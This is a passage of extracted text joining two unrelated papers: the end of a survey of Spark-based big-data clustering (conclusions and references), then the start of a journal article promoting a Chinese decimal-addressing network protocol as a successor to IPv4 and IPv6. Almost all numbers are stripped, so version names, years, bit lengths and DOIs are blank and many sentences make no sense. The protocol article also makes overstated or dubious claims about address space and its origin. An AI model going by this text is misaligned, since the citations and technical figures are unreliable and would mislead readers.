science direct labrinidis & jagadish ( ), shirkhorshidi et al. ( ), rotsnarani & mrutyunjaya ( ), huang et al. ( ), zhang et al. ( ), maheshwar & haritha ( ), ianni et al. ( ), malondkar et al. ( ), rui et al. ( ), hosseini & kourosh ( ) • clustering methods to support the characteristics of variety and velocity of big data. additionally, support new aspects of clustering such as concept drift, scalability, integration, fault-tolerance, consistency, timeliness, load balancing, privacy, and incompleteness, etc. • clustering methods to utilize spark as it is an efficient big data platform. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table shows which papers in the survey were published in each of the last years. year of publication papers number of papers wang et al. ( ), santhi & jose ( ), sarazin, lebbah & azzag ( ), solaimani et al. ( ), chakravorty et al. ( ), solaimani et al. ( ), sarazin, azzag & lebbah ( b) verma, mansuri & jain ( ), shoro & soomro ( ), bhadani & jothimani ( ), rotsnarani & mrutyunjaya ( ), shobanadevi & maragatham ( ), jin et al. ( ), kim ( ), bonab et al. ( ) bhadani & jothimani ( ), dave & gianey ( ), ajin & kumar ( ), baltas, kanavos & tsakalidis ( ), gousios ( ), assefi et al. ( ), maheshwar & haritha ( ), wang et al. ( ), sinha & jana ( ), kusuma et al. ( ), backhoff & ntoutsi ( ), sharma, shokeen & mathur ( ), zayani, ben n’cir & essoussi ( ), shah ( ), bharill, tiwari & malviya ( ), pang et al. ( ), mallios et al. ( ), guo, zhang & zhang ( ), hassani et al. ( ), zhou & wang ( ), lulli, dell’amico & ricci ( ) baltas, kanavos & tsakalidis ( ), salloum et al. ( ), armbrust et al. ( ), xu & tian ( ), shirkhorshidi et al. ( ), rujal & dabhi ( ), ding et al. ( ), ben hajkacem, ben n’cir & essoussi ( ), wu et al. ( ), gao & zhang ( ), lighari & hussain ( ), kamaruddin, ravi & mayank ( ), rui et al. ( ), liang et al. ( ), sherar & zulkernine ( ) othman et al. ( ), hu et al. ( ), kim ( ), xin et al. ( ), zerhari, lahcen & mouline ( ), sood, akshay & singh ( ), jiang et al. ( ), shanjiang et al. ( ), huang et al. ( ), ketu & agarwal ( ), ben hajkacem, ben n’cir & essoussi ( ), chitrakar & petrovic ( ), thakur & dharavath ( ), lee & kim ( ), luo et al. ( ), han et al. ( b), han et al. ( a), kim et al. ( ), baralis, garza & pastor ( ), aryal & wang ( ), gong, sinnott & rimba ( ), wang & qian ( ) aziz, zaidouni & bellafkih ( ), win et al. ( a), fatta & al ghamdi ( ), zhang et al. ( ), win et al. ( b), liu et al. ( ), lavanya, sairabanu & jain ( ), hosseini & kiani ( ), corizzo et al. ( ), hosseini & kourosh ( ), hasan et al. ( ), sembiring, jasni & embong ( ) ianni et al. ( ) conclusions as a consequence of the spread of smart devices and appearance of new technologies such as iot, huge data have been produced on daily bases. as a result, the concept of big data has appeared. unlike the traditional clustering approaches, big data clustering requires advanced parallel computing for better handling of data because of the enormous volume saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and complexity. therefore, this work contributes to the research in this area by providing a comprehensive overview of existing spark-based clustering techniques on big data and outlines some future directions in this area. due to the infancy of the big data platforms such as spark, the existing clustering techniques that are based on spark are only extensions of the traditional clustering techniques. there is still big room for developing clustering techniques designed specifically for spark making use of the random distribution of data onto spark partitions, called rdds, and the parallel computation of data in the individual rdds. through this survey we found that most existing spark-based clustering method support the volume characteristic of big data ignoring other characteristics. therefore, future research should focus on other characteristics as well such as variety and velocity. additionally, future spark-based clustering method should investigate new features such as concept drift, scalability, integration, fault-tolerance, consistency, timeliness, load balancing, privacy, etc. additional information and declarations funding the authors received support from the deanship of scientific research at prince sattam bin abdulaziz university for this research. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: deanship of scientific research at prince sattam bin abdulaziz university. competing interests the authors declare there are no competing interests. author contributions • mozamel m saeed conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. • zaher al aghbari conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • mohammed alsharidah performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: no code or raw data is involved in this research as this is a literature review. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. references ajin vw, kumar ld. . big data and clustering algorithms. in: international conference on research advances in integrated navigation systems (rains). bangalore, – doi . /rains. . . armbrust mm, xin rs, lian c, huai y, liu d, bradley jk, meng x, kaftan t, franklin mj, ghodsi a, zaharia m. . spark sql: relational data processing in spark. in: proceedings of the acm sigmod international conference on management of data (sigmod ’ ). new york: association for computing machinery, – . aryal am, wang s. . sparksnn: a density-based clustering algorithm on spark. in: ieee rd international conference on big data analysis (icbda), shanghai. – doi . /icbda. . . assefi m, behravesh e, liu g, tafti a. . big data machine learning using apache spark mllib. in: ieee international conference on big data (big data), boston, ma. – doi . /bigdata. . . aziz k, zaidouni d, bellafkih m. . real-time data analysis using spark and hadoop. in: th international conference on optimization and applications (icoa). piscataway: ieee, – . aziz k, zaidouni d, bellafkih m. . big data optimisation among rdds persistence in apache spark. in: tabii y, lazaar m, al achhab m, enneya n, eds. big data, cloud and applications. bdca . communications in computer and information science, vol. . cham: springer. backhoff o, ntoutsi e. . scalable online-offline stream clustering in apache spark. parallel implementation of density peaks clustering algorithm based on spark. in: ieee th international conference on data mining workshops (icdmw), barcelona. – doi . /icdmw. . . baltas a, kanavos a, tsakalidis ak. . an apache spark implementation for sentiment analysis on twitter data. in: sellis t, oikonomou k k, eds. algorithmic aspects of cloud computing. algocloud . lecture notes in computer science, vol. . cham: springer. baralis e, garza p, pastor e. . a density-based preprocessing technique to scale out clustering. in: ieee international conference on big data (big data), seattle, wa, usa. piscataway: ieee, – doi . /bigdata. . . ben hajkacem ma, ben n’cir ce, essoussi n. scalable random sampling k-prototypes using spark. in: ordonez c, bellatreche l, eds. big data analytics and knowledge discovery. dawak . lecture notes in computer science, vol. . cham: springer. ben hajkacem ma, ben n’cir ce, essoussi n. . kp-s: a spark-based design of the k-prototypes clustering for big data. in: ieee/acs th international con- ference on computer systems and applications (aiccsa), hammamet. – doi . /aiccsa. . . bhadani ak, jothimani d. . big data: challenges, opportunities, and realities. in: effective big data management and opportunities for implementation. hershey: igi global. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /rains. . http://dx.doi.org/ . /icbda. . http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /icdmw. . http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /aiccsa. . http://dx.doi.org/ . /peerj-cs. bharill n, tiwari a, malviya a. fuzzy based scalable clustering algorithms for han- dling big data using apache spark. ieee transactions on big data : – doi . /tbdata. . . bonab mb, hashim szm, alsaedi akz, hashim ur. . modified k-means com- bined with artificial bee colony algorithm and differential evolution for color image segmentation. in: phon-amnuaisuk s, au t, eds. computational intelligence in information systems. advances in intelligent systems and computing, vol. . cham: springer. chakravorty a, rong c, evensen p, wlodarczyk tw. . a distributed gaussian- means clustering algorithm for forecasting domestic energy usage. in: international conference on smart computing, hong kong. – doi . /smartcomp. . . chitrakar as, petrovic s. . analyzing digital evidence using parallel k-means with triangle inequality on spark. in: ieee international conference on big data (big data), seattle, wa, usa. piscataway: ieee, – doi . /bigdata. . . corizzo r, pio g, ceci m, malerba d. . dencast: distributed density-based clustering for multi-target regression. journal of big data ( ): doi . /s - - - . dave m, gianey h. . different clustering algorithms for big data analytics: a review. in: international conference system modeling & advancement in research trends (smart), moradabad. – doi . /sysmart. . . ding d, li j, wang h, liang z. . student behavior clustering method based on campus big data. in: th international conference on computational intelligence and security (cis), hong kong. – doi . /cis. . . fasheng l, xiong l. . survey on text clustering algorithm -research present situation of text clustering algorithm. in: ieee nd international conference on software engineering and service science, beijing. piscataway: ieee, – doi . /icsess. . . fatta g, al ghamdi s. . efficient clustering techniques on hadoop and spark. international journal of big data intelligence ( – ): – . gao zq, zhang lj. . dphkms: an efficient hybrid clustering preserving differential privacy in spark. in: international conference on emerging internetworking, data & web technologies. gong y, sinnott ro, rimba p. rt-dbscan: real-time parallel clustering of spatio- temporal data using spark-streaming. in: shi y, et al., eds. computational science— iccs . iccs . lecture notes in computer science, vol. . cham: springer. gousios g. . big data software analytics with apache spark. in: proceedings of the th international conference on software engineering: companion proceeed- ings(icse ’ ). new york: association for computing machinery, – doi . / . . guo y, zhang j, zhang y. . an algorithm for analyzing the city residents’ activity information through mobile big data mining. in: ieee trustcom/bigdatase/ispa, tianjin. piscataway: ieee, – doi . /trustcom. . . saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tbdata. . http://dx.doi.org/ . /smartcomp. . http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /sysmart. . http://dx.doi.org/ . /cis. . http://dx.doi.org/ . /icsess. . http://dx.doi.org/ . / . http://dx.doi.org/ . /trustcom. . http://dx.doi.org/ . /peerj-cs. han d, agrawal a, liao w, choudhary a. a. a fast dbscan algorithm with spark implementation. in: big data in engineering applications. studies in big data, vol. . singapore: springer. han d, agrawal a, liao w, choudhary a. b. parallel dbscan algorithm using a data partitioning strategy with spark implementation. in: ieee international conference on big data (big data), seattle, wa, usa. piscataway: ieee, – doi . /bigdata. . . hartigan ja, wong ma, algorithm as. . a k-means clustering algorithm. journal of the royal statistical society series c ( ): – . hasan ra, alhayali ra, zaki nd, ali ah. . an adaptive clustering and clas- sification algorithm for twitter data streaming in apache spark. telkom- nika telecommunication computing electronics and control : – doi . /telkomnika.v i . . hassani m, spaus p, cuzzocrea a, seidl t. . i-hastream: density-based hierarchical clustering of big data streams and its application to big graph analytics tools. in: th ieee/acm international symposium on cluster, cloud and grid computing (ccgrid). piscataway: ieee, – . hosseini b, kiani k. . a robust distributed big data clustering-based on adaptive density partitioning using apache spark. symmetry : doi . /sym . hosseini b, kourosh k. . a big data driven distributed density based hes- itant fuzzy clustering using apache spark with application to gene expres- sion microarray. engineering applications of artificial intelligence : – doi . /j.engappai. . . . hu s, xiao z, rao q, liao r. . an anomaly detection model of user behavior based on similarity clustering. in: ieee th information technology and mechatronics engineering conference (itoec), chongqing, china. piscataway: ieee, – doi . /itoec. . . huang f, zhu q, zhou j, tao j, zhou x, jin d, tan x, wang l. . research on the parallelization of the dbscan clustering algorithm for spatial data mining based on the spark platform. remote sensing ( ): doi . /rs . huang z. . extensions to the k-means algorithm for clustering large data sets with categorical values. data mining and knowledge discovery ( ): – doi . /a: . ianni m, masciari e, mazzeo gm, mezzanzanica m, zaniolo c. . fast and effective big data exploration by clustering. future generation computer systems : – doi . /j.future. . . . jain ak. . data clustering: years beyond k-means. pattern recognition letters ( ): – doi . /j.patrec. . . . jiang d, ooi b, shi l, wu s. . big data processing using hadoop: survey on schedul- ing. proceedings of the vldb endowment ( ): – . jin c, liu r, chen z, hendrix w, agrawal a, choudhary a. . a scalable hierarchical clustering algorithm using spark. in: ieee first international conference on big data saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /telkomnika.v i . http://dx.doi.org/ . /sym http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /itoec. . http://dx.doi.org/ . /rs http://dx.doi.org/ . /a: http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /peerj-cs. computing service and applications, redwood city, ca. piscataway: ieee, – doi . /bigdataservice. . . kamaruddin s, ravi v, mayank p. parallel evolving clustering method for big data analytics using apache spark: applications to banking and physics. in: reddy p, sureka a, chakravarthy s, bhalla s, eds. big data analytics. bda . lecture notes in computer science, vol. . cham: springer. ketu s, agarwal s. . performance enhancement of distributed k-means clus- tering for big data analytics through in-memory computation. in: eighth international conference on contemporary computing (ic ), noida. – doi . /ic . . . kim j, shin m, kim j, park c, lee s, woo j, park s , et al. . cass: a distributed network clustering algorithm based on structure similarity for large-scale network. plos one :e doi . /journal.pone. . kusuma i, ma’sum ma, habibie n, jatmiko w, suhartanto h. . design of intelligent k-means based on spark for big data clustering. in: interna- tional workshop on big data and information security (iwbis), jakarta. – doi . /iwbis. . . labrinidis a, jagadish hv. . challenges and opportunities with big data. proceedings of the vldb endowment ( ): – doi . / . . lavanya k, sairabanu j, jain p. . clustering of zika virus epidemic using gaussian mixture model in spark environment. biomedical research-tokyo : – . lee s, kim d. distributed-based hierarchical clustering system for large-scale semicon- ductor wafers. in: ieee international conference on industrial engineering and engineering management (ieem). piscataway: ieee, – . liang m, li q, geng y, wang j, wei z. . remold: an efficient model-based clustering algorithm for large datasets with spark. in: ieee rd international conference on parallel and distributed systems (icpads), shenzhen. piscataway: ieee, – . lighari sn, hussain dma. . hybrid model of rule based and clustering anal- ysis for big data security. in: first international conference on latest trends in electrical engineering and computing technologies (intellect), karachi. – doi . /intellect. . . liu b, he s, he d, zhang y, guizani m. . a spark-based parallel fuzzy c -means segmentation algorithm for agricultural image big data. ieee access : – doi . /access. . . lulli a, dell’amico m, ricci l. . ng-dbscan: scalable density-based clus- tering for arbitrary data. proceedings of the vldb endowment : – doi . / . . luo g, luo x, gooch tf, tian l, qin k. . a parallel dbscan algorithm based on spark. in: ieee international conferences on big data and cloud computing (bdcloud), social computing and networking (socialcom), sustainable computing and communi- cations (sustaincom) (bdcloud-socialcom-sustaincom), atlanta, ga. piscataway: ieee, – doi . /bdcloud-socialcom-sustaincom. . . saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bigdataservice. . http://dx.doi.org/ . /ic . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /iwbis. . http://dx.doi.org/ . / . http://dx.doi.org/ . /intellect. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . http://dx.doi.org/ . /bdcloud-socialcom-sustaincom. . http://dx.doi.org/ . /peerj-cs. maheshwar rc, haritha d. . surveyon high performance analytics of big data with apache spark. in: international conference on advanced communication control and computing technologies (icaccct), ramanathapuram. – doi . /icaccct. . . mallios x, vassalos v, venetis t, vlachou a. a framework for clustering, classification of big data using spark. in: debruyne c, et al., eds. on the move to meaningful internet systems: otm conferences. otm . lecture notes in computer science, vol. . cham: springer,. malondkar a, corizzo r, kiringa i, ceci m, japkowicz n. . spark-ghsom: growing hierarchical self-organizing map for large scale mixed attribute datasets. information sciences : – doi . /j.ins. . . . manwal m, gupta a. . big data and hadoop—a technological survey. in: interna- tional conference on emerging trends in computing and communication technologies (icetcct), dehradun. – . mishra dd, pathan s, murthy c. . apache spark based analytics of squid proxy logs. in: ieee international conference on advanced networks and telecommunications sys- tems (ants), indore, india. piscataway: ieee, – doi . /ants. . . othman sm, ba-alwi fm, alsohybe nt, al-hashida ay. . intrusion detection model using machine learning algorithm on big data environment. journal of big data : doi . /s - - - . pang h, deng l, wang l, fei m. the application of spark-based gaussian mixture model for farm environmental data analysis. in: zhang l, song x, wu y, eds. theory, methodology, tools and applications for modeling and simulation of complex systems. asiasim , scs autumnsim . communications in computer and information science, vol. . singapore: springer. rotsnarani s, mrutyunjaya p. . big data analysis using hadoop: a survey. interna- tional journal of advanced research in computer science and software engineering ( ): – . rui l, xiaoge l, liping d, shuting z, mian w. . parallel implementation of density peaks clustering algorithm based on spark. procedia computer science : – doi . /j.procs. . . . rujal b, dabhi d. . extensive survey on k-means clustering using mapreduce in datamining. in: conference: international conference on electronics and communication systems (icecs) at: coimbatore, tamilnadu, india. salloum s, dautov r, chen x, peng px, huang jz. . big data analytics on apache spark. international journal of data science and analytics ( ): – doi . /s - - - . santhi v, jose r. . performance analysis of parallel k-means with optimization al- gorithms for clustering on spark. in: negi a, bhatnagar r, parida l, eds. distributed computing and internet technology. icdcit . lecture notes in computer science, vol. . cham: springer,. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /icaccct. . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /ants. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. sarazin t, azzag h, lebbah m. . som clustering using spark-mapreduce. in: ieee international parallel & distributed processing symposium workshops, phoenix, az. piscataway: ieee, – doi . /ipdpsw. . . sarazin t, lebbah m, azzag h. . biclustering using spark-mapreduce. in: ieee international conference on big data (big data), washington, dc. piscataway: ieee, – doi . /bigdata. . . sembiring rw, jasni mz, embong a. . clustering high dimensional data using subspace and projected clustering algorithms. international journal of computer science & information technology : – doi . /ijcsit. . . shah j. . new clustering using spark. international journal of latest technology in engineering, management & applied science ( ): – . shanjiang t, he b, yu c, li y, li k. . a survey on spark ecosystem for big data processing. sharma t, shokeen v, mathur d. . multiple k-means++ clustering of satellite image using hadoop mapreduce and spark. international journal of advanced studies in computer science and engineering ( ). sherar m, zulkernine f. . particle swarm optimization for large-scale clustering on apache spark. in: ieee symposium series on computational intelligence (ssci), honolulu, hi. piscataway: ieee, – doi . /ssci. . . shirkhorshidi as, aghabozorgi s, wah ty, herawan t. big data clustering: a review. in: computational science and its applications –iccsa . iccsa . lecture notes in computer science, vol . cham: springer. shobanadevi a, maragatham g. . studying the performance of clusteringtechniques for biomedical data using spark. in: international conference on intelligent sustainable systems (iciss), palladam. – doi . /iss . . . shoro sag, soomro tr. . big data analysis: apache spark perspective. global journal of computer science and technology ( ). sinha a, jana pk. . a novel k-means based clustering algorithm for big data. in: international conference on advances in computing, communications and informatics (icacci), jaipur. – . solaimani m, iftekhar m, khan l, thuraisingham b, ingram jb. spark-based anomaly detection over multi-source vmware performance data in real-time. in: ieee symposium on computational intelligence in cyber security (cics). piscataway: ieee, – . solaimani m, iftekhar m, khan l, thuraisingham b, ingram jb. . spark-based anomaly detection over multi-source vmware performance data in real-time. in: ieee symposium on computational intelligence in cyber security (cics), orlando, fl. piscataway: ieee, – doi . /cicybs. . . sood s, singh r. . a survey of performance improvement techniques for hadoop. international journal of applied engineering research ( ): – . thakur s, dharavath r. . kmdt: a hybrid cluster approach for anomaly detection using big data. in: information and decision sciences. advances in intelligent systems and computing, vol. . singapore: springer. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ipdpsw. . http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /ijcsit. . http://dx.doi.org/ . /ssci. . http://dx.doi.org/ . /iss . . http://dx.doi.org/ . /cicybs. . http://dx.doi.org/ . /peerj-cs. verma a, mansuri ah, jain n. . big data management processing with hadoop mapreduce and spark technology: a comparison. in: symposium on colossal- data analysis and networking (cdan), indore. – doi . /cdan. . . wang b, yin j, hua q, wu z, cao j. . parallelizing k-means-based clustering on spark. in: international conference on advanced cloud and big data (cbd), chengdu. – doi . /cbd. . . wang y, qian q. . a spark-based artificial bee colony algorithm for large- scale data clustering. in: ieee th international conference on high perfor- mance computing and communications; ieee th international conference on smart city; ieee th international conference on data science and systems (hpc- c/smartcity/dss), exeter, united kingdom. piscataway: ieee, – doi . /hpcc/smartcity/dss. . . win kn, chen j, chen y, fournier-viger p. a. pcpd: a parallel crime pattern discovery system for large-scale spatiotemporal data based on fuzzy clustering. in- ternational journal of fuzzy systems : – doi . /s - - - . win kn, chen j, xiao g, chen y, viger pf. b. a parallel crime activity clustering algorithm based on apache spark cloud computing platform. in: ieee st interna- tional conference on high performance computing and communications; zhangjiajie, china. – doi . /hpcc/smartcity/dss. . . wu j, wu z, cao j, liu h, chen g, zhang y. . fuzzy consensus clustering with applications on big data. ieee transactions on fuzzy systems ( ): – doi . /tfuzz. . . xin rs, gonzalez je, franklin mj, stoica i. . graphx: aresilient distributed graph system on spark. in: first international workshop on graph data management experi- ences and systems. – : . xu d, tian y. . a comprehensive survey of clustering algorithms. annals of data science ( ): – doi . /s - - - . zayani a, ben n’cir c, essoussi n. . parallel clustering method for non-disjoint partitioning of large-scale data based on spark framework. in: ieee international conference on big data (big data), washington, dc. piscataway: ieee, – . zerhari b, lahcen aa, mouline s. . big data clustering: algorithms and challenges. in: proceedings of the international conference on big data, cloud and applications, tetuan, morocco. – . zhang y, liu h, chen t, tang d. . a distributed pcm clustering algorithm based on spark. in: proceedings of the th international conference on machine learning and computing (icmlc ’ ). new york: association for computing machinery, – doi . / . . zhou q, wang j. sparkscan: a structure similarity clustering algorithm on spark. in: big data technology and applications. bdta . communications in computer and information science, vol. . singapore: springer. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cdan. . http://dx.doi.org/ . /cbd. . http://dx.doi.org/ . /hpcc/smartcity/dss. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /hpcc/smartcity/dss. . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research and implementation of future network ipv liu zhang . school of computer science and engineering xi'an technological university xi'an, , china . state and provincial joint engineering lab. of advanced network, monitoring and control xi'an, china e-mail: @qq.com wang yubian department of railway transportation control belarusian state university of transport , kirova street, gomel, republic of belarus e-mail: alika_wang@mail.ru abstract—nowadays, ipv has been difficult to meet the needs of the internet in terms of performance, address space, security, etc. in order to solve the relevant needs of ipv , protocols such as ipv and ipv have been born. this article introduces the current status and characteristics of ipv and ipv , compares with ipv , summarizes the relevant characteristics of ipv , and introduces the production process of ipv , its protocol composition, system architecture and related application introduction. ipv is controlled by my chinese core technology and has independent intellectual property rights, which is the foundation of my country's future network. keywords-future network; decimal system; ipv i. ip a. the introduction of ip ip(internet protocol), is the network layer protocol in the tcp/ip architecture. when we use the internet, the most important question is whether my messages and actions can be successfully sent and whether i can receive messages from the outside. today, our needs are fundamentally assured through ip. sending and receiving is actually a kind of information transmission, our various operations will be various applications in the form of packets for transmission. the problem is getting from the beginning to the end, and it's not a direct highway, but a ladder of different routes that takes multiple hops to get there. the purpose of ip is to solve the problems of network connection and computer communication. each ip address consists of a network address (netid) and a host address (hostid). a network address represents which network in the internet it belongs to, and a host address represents which host in that network it belongs to. b. the introduction of ip address ip address(internet protocol address), is a unified address format that assigns a logical address to each network and host on the internet, just like our mobile phone number, which can be used to mask the physical address differences while making communication more convenient. all ip addresses consist of network id and host id. depending on the network id and host id, the internet commission has defined five ip address types to suit networks of different capacities, namely class a to class e. among them, a, b and c are the basic classes, while d and e are used as multicast and reserved. this is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . ip address ii. the features and problems of ipv and ipv a. the present situation of ipv ipv has played a key role in the development of networks, but with the expanding of network size, it can not meet the demand of network development, the first is the address resources are exhausted, lead directly to address the crisis, although no classification of addressing cidr technology, network address translation nat technology to alleviate the crisis, but still can't solve the problem. the second problem is the expansion of routing table. the topology structure of address space directly leads to the fact that the form of address allocation is irrelevant to the network topology. with the growth of the number of networks and routers, the over-expansion of routing table increases the cost of searching and storage and becomes the bottleneck of the internet. at the same time, the length of packet head is not fixed, so it is very inconvenient to extract, analyze and select the route by hardware, so it is difficult to improve the throughput rate of route data. then there is the uneven distribution of ip addresses, because of the origin of the united states, more than half of all addresses are owned by the united states, resulting in a serious imbalance in the distribution of ip addresses. there is also a lack of qos (quality of service) support. ipv did not want to be open to the public at the beginning of the design, so it is very lacking in security, and it is difficult to provide rich qos functions for real-time multimedia, mobile ip and other commercial services, although later the developed protocols such as rsvp provide qos support, but the cost of planning and constructing an ip network is relatively high. b. the features and problems of ipv ipv is a widely deployed internet protocol. the ipv protocol is simple, easy to implement and interoperable. however, with the rapid development of the internet, the deficiencies of ipv design have become increasingly obvious. ipv address space is insufficient, and the number of routing table entries that need to be maintained is too large. to solve these problems, the ietf designed ipv . compared with ipv , ipv has the following features:  ipv has a larger address space. in ipv , the length of the ip address is bits, that is, there international journal of advanced network, monitoring and controls volume , no. , are ^ - addresses; in ipv , the length of an ip address is bits, or ^ - addresses. compared with the -bit address space, the address space is greatly increased.  ipv uses smaller routing tables. ipv address assignment follows the principle of aggregation at the beginning, which enables the router to represent a subnet with an entry in the routing table, greatly reducing the length of routing table in the router, and improving the router's forwarding speed of packets.  ipv adds enhanced multicast support and flow control, which allows for the development of multimedia applications on the network and provides a good network platform for qos control.  ipv adds support for auto configuration. this is the improvement and extension of dhcp protocol, making network management more convenient and fast.  ipv has better header formatting, it uses a new header format with options that are separated from the base header and can be inserted between the base header and the upper data if desired. this simplifies and speeds up the routing process because most options do not need to be routed. despite the obvious advantages of ipv , the number of ipv routers is huge, and the transition from ipv to ipv is a gradual process, with ipv being backward compatible. therefore, ipv and ipv will coexist for a long time to come. in addition, ipv has a big flaw in the design idea of its address structure. ipv confuses the network hierarchy in design. the interface id embeds the physical address into the logical address layer, which on the one hand leads to the limitation of the physical address space to the empty ip address. security does not belong to the content of the ip layer, so it is inappropriate to design security technology in the ip layer. because with the development of security technology, security methods and key length will constantly change, so the development of security technology will eventually lead to the requirements of ip address redesign. due to the chaotic logic of the network hierarchy, ipv creates far more new problems than it solves. iii. the introduction of ipv a. the production of ipv in , chinese researcher xie jianping proposed ipv , which means "method of using whole digital code to assign address for computer." ipv is a "nickname" borrowed from the american concept of ip. in order to distinguish china's ipv from america's ipv and ipv , the v in china's ipv is uppercase, not lowercase. the patent covers the new address coding design, the new addressing mechanism and new address three technical architecture design, form a new system of ip network at the bottom of the core technology, on the basis of the design of the new framework, to form a network system that is connected and compatible to cover the existing network (the internet using ipv and ipv technologies). in , the authoritative professional agencies of the us government confirmed legally and technically that china owns the core technologies of the sovereign network under the ip framework, which are different from the existing technologies of the us internet and have independent intellectual property rights. this is the ipv patented technology, the official name of the patent is "the method of assigning addresses to computers in full numeric code." china's ipv was approved in (cn ), and has been granted patents in more than countries and regions including south africa, turkey, kazakhstan, russia, the republic of korea, the democratic people's republic of korea, hong kong, canada, singapore, australia, mexico and norway. international journal of advanced network, monitoring and controls volume , no. , in , ipv applied for the us patent, which was successively issued by the us patent office seven times with "non-final rejection opinions" and six times with final rejection letters. during this period, it was repeatedly criticized by senior members of the us ietf and famous it companies in the us. in december , the united states patent and trademark office (pto) officially issued the patent certificate no. and us , , , and stated in its notification of approval that the applicant's verification report was "very convincing". ipv protocol refers to the - arabic digital network as virtual ip address, and the decimal system as the text of the representation method, that is, a convenient way to find the use of the internet users; for efficiency and end-user convenience, some of the addresses can be used as domain directly; it has an infinite number of allocatable ip addresses, with a maximum of by bits, and is the cornerstone of the future digital world. at the same time, due to the use of the original computer network, cable broadcast television network and telecommunications network business classification code, therefore, also known as the "new generation of secure and reliable information integrated network protocol." b. the characteristics of ipv compared with ipv and ipv , ipv has more obvious features and advantages, mainly reflected in the following points: ) address space is huge ipv has a larger address space than ipv /ipv . ipv defines the bit length of ip address is , that is, there are - addresses; while the length of ipv is , that is, - addresses, the standard length of an ipv address is - , with layers address structure design will be - ( - ). to put it mildly, if ipv were widely used, every grain of sand in the world would have an ip address. then after ipv is widely used, the smallest molecule of bright matter in the whole universe will have a corresponding address. it is no exaggeration to say that if ipv is fully applied, every cell and living gene in the world can be assigned to an ipv address. layer is the asset management address (including legal digital currency space) compatible with ean-ucc barcode length. ) route tables are smaller ipv has a smaller routing table than ipv . the address allocation of ipv follows the principle of aggregation at the beginning, which enables the router to represent a subnet with an entry in the table, this greatly reducing the length of routing table in the router, and improving the speed of forwarding packets in the routing table. the routing table of ipv is very small, and the address allocation of ipv follows the principle of geo-spatial clustering from the beginning, which enables ipv router to represent a country subnet and an application subnet with a single record, it greatly reducing the length and cleanliness of routing table in the router, and improving the speed of forwarding packets by routing table. at the same time, this subnet can express a specific geographical location, for example, we assign the ipv address segment of shanghai as [ [ ]/ , then in other routers of the same level, only one route pointing to the address segment of [ [ ]/ can realize the ipv address routing of shanghai. according to this logic, only one route is needed from country to country. for example, the route to china is / . the ipv routing table is large and irregular, and the ipv routing table is smaller than ipv , but the ipv routing table contains no geographic information and the routing is messy. ) automatic configuration support ipv adds support for automatic configuration of variable length addresses, which is an improvement and extension of dhcp protocol of ipv , making network management more convenient. ipv supports multicast, and supports the iso/iec c future network << naming and addressing >>tcp/ip/m model, and international journal of advanced network, monitoring and controls volume , no. , supports long packet code streams for virtual and real circuits. this allows multimedia applications on the web to ensure video quality and reduce overhead, provide faster and faster applications such as industrial controls and unmanned vehicles, and provide better and cheaper service over the internet than ipv . ) address length could be select ipv address length has a variety of options, which can realize the change of , , , , , and bit address length, and select the most appropriate address length according to different usage scenarios to reduce the routing overhead. ) dual encryption the address length of ipv is long enough to realize dual encryption from the transmission of source and target addresses, which plays an important role in some specific network transmission fields. ipv network makes use of logical isolation features to make network information transmission more secure and effective. ) add location information to the address ipv addresses can be embedded with geo-location information, as well as personal and industry id information, this making ip addresses uniquely tied to personal information. ) compatible with previous addresses ipv address is backward compatible with ipv /ipv address. in order to absorb the upgrade difficulty of ipv incompatibility with ipv , ipv protocol remains and unchanged, so that ipv /ipv upgrade to the new version of ipv , the upgrade cost is very low. ) sovereignty is different ipv /ipv addresses spaces and copyright ownership: united states. ipv address space and copyright ownership: china. ipv has its own intellectual property rights and was proposed by the internet assigned numbers authority (iana), but it is china that has succeeded in developing and mastering the core technology. compared with ipv /v , china has the core patent digital domain system of ipv technology, which is of great significance for the future development of china's network and the mastery of the security of cyberspace. c. the construction of ipv protocol the ipv protocol includes message protocol, address protocol, transition protocol, mobile communication protocol, etc, as shown in figure . figure . ipv protocol ) address protocol the ipv network expands the number of address bits to bits, realizing a huge addressing space. and according to different data transmission methods, ipv addresses are divided into three types: unicast, anycast and multicast. in summary, it is the difference between one-to-one, one-to-one recent and one-to-many. 